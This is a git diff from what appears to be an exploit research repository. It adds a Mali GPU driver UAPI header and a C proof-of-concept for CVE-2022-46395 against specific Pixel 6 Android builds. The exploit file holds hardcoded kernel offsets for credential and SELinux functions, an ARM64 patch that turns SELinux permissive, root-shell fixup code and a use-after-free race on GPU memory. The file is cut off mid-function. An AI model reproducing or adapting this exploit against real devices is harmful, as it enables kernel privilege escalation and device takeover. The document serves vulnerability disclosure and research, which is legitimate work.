KBASE_JD_ATOM_STATE_COMPLETED +}; + +/** + * typedef base_atom_id - Type big enough to store an atom number in. + */ +typedef __u8 base_atom_id; + +/** + * struct base_dependency - + * + * @atom_id: An atom number + * @dependency_type: Dependency type + */ +struct base_dependency { + base_atom_id atom_id; + base_jd_dep_type dependency_type; +}; + +/** + * struct base_jd_fragment - Set of GPU fragment job chains used for rendering. + * + * @norm_read_norm_write: Job chain for full rendering. + * GPU address of a fragment job chain to render in the + * circumstance where the tiler job chain did not exceed + * its memory usage threshold and no fragment job chain + * was previously run for the same renderpass. + * It is used no more than once per renderpass. + * @norm_read_forced_write: Job chain for starting incremental + * rendering. + * GPU address of a fragment job chain to render in + * the circumstance where the tiler job chain exceeded + * its memory usage threshold for the first time and + * no fragment job chain was previously run for the + * same renderpass. + * Writes unresolved multisampled and normally- + * discarded output to temporary buffers that must be + * read back by a subsequent forced_read job chain + * before the renderpass is complete. + * It is used no more than once per renderpass. + * @forced_read_forced_write: Job chain for continuing incremental + * rendering. + * GPU address of a fragment job chain to render in + * the circumstance where the tiler job chain + * exceeded its memory usage threshold again + * and a fragment job chain was previously run for + * the same renderpass. + * Reads unresolved multisampled and + * normally-discarded output from temporary buffers + * written by a previous forced_write job chain and + * writes the same to temporary buffers again. + * It is used as many times as required until + * rendering completes. + * @forced_read_norm_write: Job chain for ending incremental rendering. + * GPU address of a fragment job chain to render in the + * circumstance where the tiler job chain did not + * exceed its memory usage threshold this time and a + * fragment job chain was previously run for the same + * renderpass. + * Reads unresolved multisampled and normally-discarded + * output from temporary buffers written by a previous + * forced_write job chain in order to complete a + * renderpass. + * It is used no more than once per renderpass. + * + * This structure is referenced by the main atom structure if + * BASE_JD_REQ_END_RENDERPASS is set in the base_jd_core_req. + */ +struct base_jd_fragment { + __u64 norm_read_norm_write; + __u64 norm_read_forced_write; + __u64 forced_read_forced_write; + __u64 forced_read_norm_write; +}; + +/** + * typedef base_jd_prio - Base Atom priority. + * + * Only certain priority levels are actually implemented, as specified by the + * BASE_JD_PRIO_<...> definitions below. It is undefined to use a priority + * level that is not one of those defined below. + * + * Priority levels only affect scheduling after the atoms have had dependencies + * resolved. For example, a low priority atom that has had its dependencies + * resolved might run before a higher priority atom that has not had its + * dependencies resolved. + * + * In general, fragment atoms do not affect non-fragment atoms with + * lower priorities, and vice versa. One exception is that there is only one + * priority value for each context. So a high-priority (e.g.) fragment atom + * could increase its context priority, causing its non-fragment atoms to also + * be scheduled sooner. + * + * The atoms are scheduled as follows with respect to their priorities: + * * Let atoms 'X' and 'Y' be for the same job slot who have dependencies + * resolved, and atom 'X' has a higher priority than atom 'Y' + * * If atom 'Y' is currently running on the HW, then it is interrupted to + * allow atom 'X' to run soon after + * * If instead neither atom 'Y' nor atom 'X' are running, then when choosing + * the next atom to run, atom 'X' will always be chosen instead of atom 'Y' + * * Any two atoms that have the same priority could run in any order with + * respect to each other. That is, there is no ordering constraint between + * atoms of the same priority. + * + * The sysfs file 'js_ctx_scheduling_mode' is used to control how atoms are + * scheduled between contexts. The default value, 0, will cause higher-priority + * atoms to be scheduled first, regardless of their context. The value 1 will + * use a round-robin algorithm when deciding which context's atoms to schedule + * next, so higher-priority atoms can only preempt lower priority atoms within + * the same context. See KBASE_JS_SYSTEM_PRIORITY_MODE and + * KBASE_JS_PROCESS_LOCAL_PRIORITY_MODE for more details. + */ +typedef __u8 base_jd_prio; + +/* Medium atom priority. This is a priority higher than BASE_JD_PRIO_LOW */ +#define BASE_JD_PRIO_MEDIUM ((base_jd_prio)0) +/* High atom priority. This is a priority higher than BASE_JD_PRIO_MEDIUM and + * BASE_JD_PRIO_LOW + */ +#define BASE_JD_PRIO_HIGH ((base_jd_prio)1) +/* Low atom priority. */ +#define BASE_JD_PRIO_LOW ((base_jd_prio)2) +/* Real-Time atom priority. This is a priority higher than BASE_JD_PRIO_HIGH, + * BASE_JD_PRIO_MEDIUM, and BASE_JD_PRIO_LOW + */ +#define BASE_JD_PRIO_REALTIME ((base_jd_prio)3) + +/* Count of the number of priority levels. This itself is not a valid + * base_jd_prio setting + */ +#define BASE_JD_NR_PRIO_LEVELS 4 + +/** + * struct base_jd_atom_v2 - Node of a dependency graph used to submit a + * GPU job chain or soft-job to the kernel driver. + * + * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS + * is set in the base_jd_core_req) the CPU address of a + * base_jd_fragment object. + * @udata: User data. + * @extres_list: List of external resources. + * @nr_extres: Number of external resources or JIT allocations. + * @jit_id: Zero-terminated array of IDs of just-in-time memory + * allocations written to by the atom. When the atom + * completes, the value stored at the + * &struct_base_jit_alloc_info.heap_info_gpu_addr of + * each allocation is read in order to enforce an + * overall physical memory usage limit. + * @pre_dep: Pre-dependencies. One need to use SETTER function to assign + * this field; this is done in order to reduce possibility of + * improper assignment of a dependency field. + * @atom_number: Unique number to identify the atom. + * @prio: Atom priority. Refer to base_jd_prio for more details. + * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP + * specified. + * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified. + * @core_req: Core requirements. + * @renderpass_id: Renderpass identifier used to associate an atom that has + * BASE_JD_REQ_START_RENDERPASS set in its core requirements + * with an atom that has BASE_JD_REQ_END_RENDERPASS set. + * @padding: Unused. Must be zero. + * + * This structure has changed since UK 10.2 for which base_jd_core_req was a + * __u16 value. + * + * In UK 10.3 a core_req field of a __u32 type was added to the end of the + * structure, and the place in the structure previously occupied by __u16 + * core_req was kept but renamed to compat_core_req. + * + * From UK 11.20 - compat_core_req is now occupied by __u8 jit_id[2]. + * Compatibility with UK 10.x from UK 11.y is not handled because + * the major version increase prevents this. + * + * For UK 11.20 jit_id[2] must be initialized to zero. + */ +struct base_jd_atom_v2 { + __u64 jc; + struct base_jd_udata udata; + __u64 extres_list; + __u16 nr_extres; + __u8 jit_id[2]; + struct base_dependency pre_dep[2]; + base_atom_id atom_number; + base_jd_prio prio; + __u8 device_nr; + __u8 jobslot; + base_jd_core_req core_req; + __u8 renderpass_id; + __u8 padding[7]; +}; + +/** + * struct base_jd_atom - Same as base_jd_atom_v2, but has an extra seq_nr + * at the beginning. + * + * @seq_nr: Sequence number of logical grouping of atoms. + * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS + * is set in the base_jd_core_req) the CPU address of a + * base_jd_fragment object. + * @udata: User data. + * @extres_list: List of external resources. + * @nr_extres: Number of external resources or JIT allocations. + * @jit_id: Zero-terminated array of IDs of just-in-time memory + * allocations written to by the atom. When the atom + * completes, the value stored at the + * &struct_base_jit_alloc_info.heap_info_gpu_addr of + * each allocation is read in order to enforce an + * overall physical memory usage limit. + * @pre_dep: Pre-dependencies. One need to use SETTER function to assign + * this field; this is done in order to reduce possibility of + * improper assignment of a dependency field. + * @atom_number: Unique number to identify the atom. + * @prio: Atom priority. Refer to base_jd_prio for more details. + * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP + * specified. + * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified. + * @core_req: Core requirements. + * @renderpass_id: Renderpass identifier used to associate an atom that has + * BASE_JD_REQ_START_RENDERPASS set in its core requirements + * with an atom that has BASE_JD_REQ_END_RENDERPASS set. + * @padding: Unused. Must be zero. + */ +typedef struct base_jd_atom { + __u64 seq_nr; + __u64 jc; + struct base_jd_udata udata; + __u64 extres_list; + __u16 nr_extres; + __u8 jit_id[2]; + struct base_dependency pre_dep[2]; + base_atom_id atom_number; + base_jd_prio prio; + __u8 device_nr; + __u8 jobslot; + base_jd_core_req core_req; + __u8 renderpass_id; + __u8 padding[7]; +} base_jd_atom; + +struct base_jit_alloc_info { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; + __u8 bin_id; + __u8 max_allocations; + __u8 flags; + __u8 padding[2]; + __u16 usage_id; + __u64 heap_info_gpu_addr; +}; + +struct base_external_resource { + __u64 ext_resource; +}; + +/* Job chain event code bits + * Defines the bits used to create ::base_jd_event_code + */ +enum { + BASE_JD_SW_EVENT_KERNEL = (1u << 15), /* Kernel side event */ + BASE_JD_SW_EVENT = (1u << 14), /* SW defined event */ + /* Event indicates success (SW events only) */ + BASE_JD_SW_EVENT_SUCCESS = (1u << 13), + BASE_JD_SW_EVENT_JOB = (0u << 11), /* Job related event */ + BASE_JD_SW_EVENT_BAG = (1u << 11), /* Bag related event */ + BASE_JD_SW_EVENT_INFO = (2u << 11), /* Misc/info event */ + BASE_JD_SW_EVENT_RESERVED = (3u << 11), /* Reserved event type */ + /* Mask to extract the type from an event code */ + BASE_JD_SW_EVENT_TYPE_MASK = (3u << 11) +}; + +/** + * enum base_jd_event_code - Job chain event codes + * + * @BASE_JD_EVENT_RANGE_HW_NONFAULT_START: Start of hardware non-fault status + * codes. + * Obscurely, BASE_JD_EVENT_TERMINATED + * indicates a real fault, because the + * job was hard-stopped. + * @BASE_JD_EVENT_NOT_STARTED: Can't be seen by userspace, treated as + * 'previous job done'. + * @BASE_JD_EVENT_STOPPED: Can't be seen by userspace, becomes + * TERMINATED, DONE or JOB_CANCELLED. + * @BASE_JD_EVENT_TERMINATED: This is actually a fault status code - the job + * was hard stopped. + * @BASE_JD_EVENT_ACTIVE: Can't be seen by userspace, jobs only returned on + * complete/fail/cancel. + * @BASE_JD_EVENT_RANGE_HW_NONFAULT_END: End of hardware non-fault status codes. + * Obscurely, BASE_JD_EVENT_TERMINATED + * indicates a real fault, + * because the job was hard-stopped. + * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START: Start of hardware fault and + * software error status codes. + * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END: End of hardware fault and + * software error status codes. + * @BASE_JD_EVENT_RANGE_SW_SUCCESS_START: Start of software success status + * codes. + * @BASE_JD_EVENT_RANGE_SW_SUCCESS_END: End of software success status codes. + * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_START: Start of kernel-only status codes. + * Such codes are never returned to + * user-space. + * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_END: End of kernel-only status codes. + * @BASE_JD_EVENT_DONE: atom has completed successfull + * @BASE_JD_EVENT_JOB_CONFIG_FAULT: Atom dependencies configuration error which + * shall result in a failed atom + * @BASE_JD_EVENT_JOB_POWER_FAULT: The job could not be executed because the + * part of the memory system required to access + * job descriptors was not powered on + * @BASE_JD_EVENT_JOB_READ_FAULT: Reading a job descriptor into the Job + * manager failed + * @BASE_JD_EVENT_JOB_WRITE_FAULT: Writing a job descriptor from the Job + * manager failed + * @BASE_JD_EVENT_JOB_AFFINITY_FAULT: The job could not be executed because the + * specified affinity mask does not intersect + * any available cores + * @BASE_JD_EVENT_JOB_BUS_FAULT: A bus access failed while executing a job + * @BASE_JD_EVENT_INSTR_INVALID_PC: A shader instruction with an illegal program + * counter was executed. + * @BASE_JD_EVENT_INSTR_INVALID_ENC: A shader instruction with an illegal + * encoding was executed. + * @BASE_JD_EVENT_INSTR_TYPE_MISMATCH: A shader instruction was executed where + * the instruction encoding did not match the + * instruction type encoded in the program + * counter. + * @BASE_JD_EVENT_INSTR_OPERAND_FAULT: A shader instruction was executed that + * contained invalid combinations of operands. + * @BASE_JD_EVENT_INSTR_TLS_FAULT: A shader instruction was executed that tried + * to access the thread local storage section + * of another thread. + * @BASE_JD_EVENT_INSTR_ALIGN_FAULT: A shader instruction was executed that + * tried to do an unsupported unaligned memory + * access. + * @BASE_JD_EVENT_INSTR_BARRIER_FAULT: A shader instruction was executed that + * failed to complete an instruction barrier. + * @BASE_JD_EVENT_DATA_INVALID_FAULT: Any data structure read as part of the job + * contains invalid combinations of data. + * @BASE_JD_EVENT_TILE_RANGE_FAULT: Tile or fragment shading was asked to + * process a tile that is entirely outside the + * bounding box of the frame. + * @BASE_JD_EVENT_STATE_FAULT: Matches ADDR_RANGE_FAULT. A virtual address + * has been found that exceeds the virtual + * address range. + * @BASE_JD_EVENT_OUT_OF_MEMORY: The tiler ran out of memory when executing a job. + * @BASE_JD_EVENT_UNKNOWN: If multiple jobs in a job chain fail, only + * the first one the reports an error will set + * and return full error information. + * Subsequent failing jobs will not update the + * error status registers, and may write an + * error status of UNKNOWN. + * @BASE_JD_EVENT_DELAYED_BUS_FAULT: The GPU received a bus fault for access to + * physical memory where the original virtual + * address is no longer available. + * @BASE_JD_EVENT_SHAREABILITY_FAULT: Matches GPU_SHAREABILITY_FAULT. A cache + * has detected that the same line has been + * accessed as both shareable and non-shareable + * memory from inside the GPU. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1: A memory access hit an invalid table + * entry at level 1 of the translation table. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2: A memory access hit an invalid table + * entry at level 2 of the translation table. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3: A memory access hit an invalid table + * entry at level 3 of the translation table. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4: A memory access hit an invalid table + * entry at level 4 of the translation table. + * @BASE_JD_EVENT_PERMISSION_FAULT: A memory access could not be allowed due to + * the permission flags set in translation + * table + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1: A bus fault occurred while reading + * level 0 of the translation tables. + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2: A bus fault occurred while reading + * level 1 of the translation tables. + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3: A bus fault occurred while reading + * level 2 of the translation tables. + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4: A bus fault occurred while reading + * level 3 of the translation tables. + * @BASE_JD_EVENT_ACCESS_FLAG: Matches ACCESS_FLAG_0. A memory access hit a + * translation table entry with the ACCESS_FLAG + * bit set to zero in level 0 of the + * page table, and the DISABLE_AF_FAULT flag + * was not set. + * @BASE_JD_EVENT_MEM_GROWTH_FAILED: raised for JIT_ALLOC atoms that failed to + * grow memory on demand + * @BASE_JD_EVENT_JOB_CANCELLED: raised when this atom was hard-stopped or its + * dependencies failed + * @BASE_JD_EVENT_JOB_INVALID: raised for many reasons, including invalid data + * in the atom which overlaps with + * BASE_JD_EVENT_JOB_CONFIG_FAULT, or if the + * platform doesn't support the feature specified in + * the atom. + * @BASE_JD_EVENT_PM_EVENT: TODO: remove as it's not used + * @BASE_JD_EVENT_TIMED_OUT: TODO: remove as it's not used + * @BASE_JD_EVENT_BAG_INVALID: TODO: remove as it's not used + * @BASE_JD_EVENT_PROGRESS_REPORT: TODO: remove as it's not used + * @BASE_JD_EVENT_BAG_DONE: TODO: remove as it's not used + * @BASE_JD_EVENT_DRV_TERMINATED: this is a special event generated to indicate + * to userspace that the KBase context has been + * destroyed and Base should stop listening for + * further events + * @BASE_JD_EVENT_REMOVED_FROM_NEXT: raised when an atom that was configured in + * the GPU has to be retried (but it has not + * started) due to e.g., GPU reset + * @BASE_JD_EVENT_END_RP_DONE: this is used for incremental rendering to signal + * the completion of a renderpass. This value + * shouldn't be returned to userspace but I haven't + * seen where it is reset back to JD_EVENT_DONE. + * + * HW and low-level SW events are represented by event codes. + * The status of jobs which succeeded are also represented by + * an event code (see @BASE_JD_EVENT_DONE). + * Events are usually reported as part of a &struct base_jd_event. + * + * The event codes are encoded in the following way: + * * 10:0 - subtype + * * 12:11 - type + * * 13 - SW success (only valid if the SW bit is set) + * * 14 - SW event (HW event if not set) + * * 15 - Kernel event (should never be seen in userspace) + * + * Events are split up into ranges as follows: + * * BASE_JD_EVENT_RANGE__START + * * BASE_JD_EVENT_RANGE__END + * + * code is in 's range when: + * BASE_JD_EVENT_RANGE__START <= code < + * BASE_JD_EVENT_RANGE__END + * + * Ranges can be asserted for adjacency by testing that the END of the previous + * is equal to the START of the next. This is useful for optimizing some tests + * for range. + * + * A limitation is that the last member of this enum must explicitly be handled + * (with an assert-unreachable statement) in switch statements that use + * variables of this type. Otherwise, the compiler warns that we have not + * handled that enum value. + */ +enum base_jd_event_code { + /* HW defined exceptions */ + BASE_JD_EVENT_RANGE_HW_NONFAULT_START = 0, + + /* non-fatal exceptions */ + BASE_JD_EVENT_NOT_STARTED = 0x00, + BASE_JD_EVENT_DONE = 0x01, + BASE_JD_EVENT_STOPPED = 0x03, + BASE_JD_EVENT_TERMINATED = 0x04, + BASE_JD_EVENT_ACTIVE = 0x08, + + BASE_JD_EVENT_RANGE_HW_NONFAULT_END = 0x40, + BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START = 0x40, + + /* job exceptions */ + BASE_JD_EVENT_JOB_CONFIG_FAULT = 0x40, + BASE_JD_EVENT_JOB_POWER_FAULT = 0x41, + BASE_JD_EVENT_JOB_READ_FAULT = 0x42, + BASE_JD_EVENT_JOB_WRITE_FAULT = 0x43, + BASE_JD_EVENT_JOB_AFFINITY_FAULT = 0x44, + BASE_JD_EVENT_JOB_BUS_FAULT = 0x48, + BASE_JD_EVENT_INSTR_INVALID_PC = 0x50, + BASE_JD_EVENT_INSTR_INVALID_ENC = 0x51, + BASE_JD_EVENT_INSTR_TYPE_MISMATCH = 0x52, + BASE_JD_EVENT_INSTR_OPERAND_FAULT = 0x53, + BASE_JD_EVENT_INSTR_TLS_FAULT = 0x54, + BASE_JD_EVENT_INSTR_BARRIER_FAULT = 0x55, + BASE_JD_EVENT_INSTR_ALIGN_FAULT = 0x56, + BASE_JD_EVENT_DATA_INVALID_FAULT = 0x58, + BASE_JD_EVENT_TILE_RANGE_FAULT = 0x59, + BASE_JD_EVENT_STATE_FAULT = 0x5A, + BASE_JD_EVENT_OUT_OF_MEMORY = 0x60, + BASE_JD_EVENT_UNKNOWN = 0x7F, + + /* GPU exceptions */ + BASE_JD_EVENT_DELAYED_BUS_FAULT = 0x80, + BASE_JD_EVENT_SHAREABILITY_FAULT = 0x88, + + /* MMU exceptions */ + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1 = 0xC1, + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2 = 0xC2, + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3 = 0xC3, + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4 = 0xC4, + BASE_JD_EVENT_PERMISSION_FAULT = 0xC8, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1 = 0xD1, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2 = 0xD2, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3 = 0xD3, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4 = 0xD4, + BASE_JD_EVENT_ACCESS_FLAG = 0xD8, + + /* SW defined exceptions */ + BASE_JD_EVENT_MEM_GROWTH_FAILED = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x000, + BASE_JD_EVENT_TIMED_OUT = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x001, + BASE_JD_EVENT_JOB_CANCELLED = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x002, + BASE_JD_EVENT_JOB_INVALID = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x003, + BASE_JD_EVENT_PM_EVENT = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x004, + + BASE_JD_EVENT_BAG_INVALID = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_BAG | 0x003, + + BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_RESERVED | 0x3FF, + + BASE_JD_EVENT_RANGE_SW_SUCCESS_START = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | 0x000, + + BASE_JD_EVENT_PROGRESS_REPORT = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_JOB | 0x000, + BASE_JD_EVENT_BAG_DONE = BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_SUCCESS | + BASE_JD_SW_EVENT_BAG | 0x000, + BASE_JD_EVENT_DRV_TERMINATED = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_INFO | 0x000, + + BASE_JD_EVENT_RANGE_SW_SUCCESS_END = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_RESERVED | 0x3FF, + + BASE_JD_EVENT_RANGE_KERNEL_ONLY_START = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | 0x000, + BASE_JD_EVENT_REMOVED_FROM_NEXT = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x000, + BASE_JD_EVENT_END_RP_DONE = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x001, + + BASE_JD_EVENT_RANGE_KERNEL_ONLY_END = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_RESERVED | 0x3FF +}; + +/** + * struct base_jd_event_v2 - Event reporting structure + * + * @event_code: event code. + * @atom_number: the atom number that has completed. + * @udata: user data. + * + * This structure is used by the kernel driver to report information + * about GPU events. They can either be HW-specific events or low-level + * SW events, such as job-chain completion. + * + * The event code contains an event type field which can be extracted + * by ANDing with BASE_JD_SW_EVENT_TYPE_MASK. + */ +struct base_jd_event_v2 { + enum base_jd_event_code event_code; + base_atom_id atom_number; + struct base_jd_udata udata; +}; + +/** + * struct base_dump_cpu_gpu_counters - Structure for + * BASE_JD_REQ_SOFT_DUMP_CPU_GPU_COUNTERS + * jobs. + * @system_time: gpu timestamp + * @cycle_counter: gpu cycle count + * @sec: cpu time(sec) + * @usec: cpu time(usec) + * @padding: padding + * + * This structure is stored into the memory pointed to by the @jc field + * of &struct base_jd_atom. + * + * It must not occupy the same CPU cache line(s) as any neighboring data. + * This is to avoid cases where access to pages containing the structure + * is shared between cached and un-cached memory regions, which would + * cause memory corruption. + */ + +struct base_dump_cpu_gpu_counters { + __u64 system_time; + __u64 cycle_counter; + __u64 sec; + __u32 usec; + __u8 padding[36]; +}; + +#endif /* _UAPI_BASE_JM_KERNEL_H_ */ + diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mali_user_buf.c b/SecurityExploits/Android/Mali/CVE_2022_46395/mali_user_buf.c new file mode 100644 index 0000000..624de53 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mali_user_buf.c @@ -0,0 +1,670 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "mali.h" +#include "mali_base_jm_kernel.h" +#include "mempool_utils.h" +#include "mem_write.h" + +#define MALI "/dev/mali0" + +#define PAGE_SHIFT 12 + +#define BASE_MEM_ALIAS_MAX_ENTS ((size_t)24576) + +#define RESERVED_SIZE 32 + +#define TOTAL_RESERVED_SIZE 1024 + +#define PFN_DOWN(x) ((x) >> PAGE_SHIFT) + +#define UNMAP_CPU 1 + +#define UPDATE_CPU 0 + +#define WAIT_CPU 2 + +#define NB_PREEMPT_THREAD 32 + +#define NR_WATCHES 100 //5000 +#define NR_EPFDS 500 + +#define TEST_ENT 3 + +#define NSEC_PER_SEC 1000000000UL + +#define DEFAULT_WAIT 505 + +#define CORRUPTED_VA_SIZE 500 + +#define CORRUPTED_COMMIT_SIZE 10 + +#define AVC_DENY_2211 0x8d6810 + +#define SEL_READ_ENFORCE_2211 0x8ea124 + +#define INIT_CRED_2211 0x2fd1388 + +#define COMMIT_CREDS_2211 0x17ada4 + +#define ADD_INIT_2211 0x910e2000 //add x0, x0, #0x388 + +#define ADD_COMMIT_2211 0x91369108 //add x8, x8, #0xda4 + +#define AVC_DENY_2212 0x8ba710 + +#define SEL_READ_ENFORCE_2212 0x8cdfd4 + +#define INIT_CRED_2212 0x2fd1418 + +#define COMMIT_CREDS_2212 0x177ee4 + +#define ADD_INIT_2212 0x91106000 //add x0, x0, #0x418 + +#define ADD_COMMIT_2212 0x913b9108 //add x8, x8, #0xee4 + +#define AVC_DENY_2301 0x8ba710 + +#define SEL_READ_ENFORCE_2301 0x8cdfd4 + +#define INIT_CRED_2301 0x2fd1418 + +#define COMMIT_CREDS_2301 0x177ee4 + +#define ADD_INIT_2301 0x91106000 //add x0, x0, #0x418 + +#define ADD_COMMIT_2301 0x913b9108 //add x8, x8, #0xee4 + +static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2211; + +static uint64_t avc_deny = AVC_DENY_2211; + +static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; + +static uint32_t root_code[8] = {0}; + +static uint64_t uevent; +static uint8_t atom_number = 0; +static volatile int g_ready_unmap = 0; +static struct timespec unmap_time; +static struct timespec finished_fault_time; +static uint8_t g_initial_read = TEST_ENT; +static int need_reset_fd = 0; +static volatile bool success = false; +static int error_code = 0; +static struct timespec finished_reset_time; +static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE]; +static uint64_t corrupted_region = 0; +static uint64_t benchmark_time = DEFAULT_WAIT; +static uint64_t this_benchmark_time = 0; + +#define OFF 4 + +#define SYSCHK(x) ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ +}) + + +void select_offset() { + char fingerprint[256]; + int len = __system_property_get("ro.build.fingerprint", fingerprint); + LOG("fingerprint: %s\n", fingerprint); + if (!strcmp(fingerprint, "google/oriole/oriole:13/TP1A.221105.002/9080065:user/release-keys")) { + avc_deny = AVC_DENY_2211; + sel_read_enforce = SEL_READ_ENFORCE_2211; + fixup_root_shell(INIT_CRED_2211, COMMIT_CREDS_2211, SEL_READ_ENFORCE_2211, ADD_INIT_2211, ADD_COMMIT_2211, &(root_code[0])); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys")) { + avc_deny = AVC_DENY_2212; + sel_read_enforce = SEL_READ_ENFORCE_2212; + fixup_root_shell(INIT_CRED_2212, COMMIT_CREDS_2212, SEL_READ_ENFORCE_2212, ADD_INIT_2212, ADD_COMMIT_2212, &(root_code[0])); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys")) { + avc_deny = AVC_DENY_2301; + sel_read_enforce = SEL_READ_ENFORCE_2301; + fixup_root_shell(INIT_CRED_2301, COMMIT_CREDS_2301, SEL_READ_ENFORCE_2301, ADD_INIT_2301, ADD_COMMIT_2301, &(root_code[0])); + return; + } + + err(1, "unable to match build id\n"); +} + +static int io_setup(unsigned nr, aio_context_t *ctxp) +{ + return syscall(__NR_io_setup, nr, ctxp); +} + +static int io_destroy(aio_context_t ctx) +{ + return syscall(__NR_io_destroy, ctx); +} + +void epoll_add(int epfd, int fd) { + struct epoll_event ev = { .events = EPOLLIN }; + SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev)); +} + +struct timespec get_mono_time(void) { + struct timespec ts; + SYSCHK(clock_gettime(CLOCK_MONOTONIC, &ts)); + return ts; +} + +inline unsigned long timespec_to_ns(struct timespec ts) { + return ts.tv_sec * NSEC_PER_SEC + ts.tv_nsec; +} + +void ts_sub(struct timespec *ts, unsigned long nsecs) { + if (ts->tv_nsec < nsecs) { + ts->tv_sec--; + ts->tv_nsec += NSEC_PER_SEC; + } + ts->tv_nsec -= nsecs; +} +void ts_add(struct timespec *ts, unsigned long nsecs) { + ts->tv_nsec += nsecs; + if (ts->tv_nsec >= NSEC_PER_SEC) { + ts->tv_sec++; + ts->tv_nsec -= NSEC_PER_SEC; + } +} +bool ts_is_in_future(struct timespec ts) { + struct timespec cur = get_mono_time(); + if (ts.tv_sec > cur.tv_sec) + return true; + if (ts.tv_sec < cur.tv_sec) + return false; + return ts.tv_nsec > cur.tv_nsec; +} + +void setup_timerfd() { + int tfd = SYSCHK(timerfd_create(CLOCK_MONOTONIC, 0)); + int tfd_dups[NR_WATCHES]; + for (int i=0; itv_sec < t2->tv_sec) return true; + if (t1->tv_sec > t2->tv_sec) return false; + return t1->tv_nsec < t2->tv_nsec; +} + +bool before_reset() { + return finished_reset_time.tv_sec == 0 || before(&finished_fault_time, &finished_reset_time); +} + +void* unmap_resources(void* args) { + uint64_t* arguments = (uint64_t*)args; + int mali_fd = (int)(arguments[0]); + + migrate_to_cpu(UNMAP_CPU); + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = (64ul << 12) + 0x1000}; + + while (!g_ready_unmap); + while (ts_is_in_future(unmap_time)); + migrate_to_cpu(UNMAP_CPU); + g_initial_read = *(volatile uint8_t*)(uevent + OFF); + if (g_initial_read != TEST_ENT) return NULL; + ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free); + finished_fault_time = get_mono_time(); + if (!before_reset()) return NULL; +// LOG("finished reset time %ld %ld fault time %ld %ld\n", finished_reset_time.tv_sec, finished_reset_time.tv_nsec, finished_fault_time.tv_sec, finished_fault_time.tv_nsec); + unmap_external_resource(mali_fd, uevent); + corrupted_region = (uint64_t)map_gpu(mali_fd, CORRUPTED_VA_SIZE, CORRUPTED_COMMIT_SIZE, false, 1); + +// struct timespec time_now = get_mono_time(); +// LOG("finished reset time: %ld %ld, finished map time: %ld %ld\n", finished_reset_time.tv_sec, finished_reset_time.tv_nsec, time_now.tv_sec, time_now.tv_nsec); + return NULL; +} + +void check_success() { + if (error_code != 0 || g_initial_read != TEST_ENT) return; + if (finished_fault_time.tv_sec == 0) return; + if 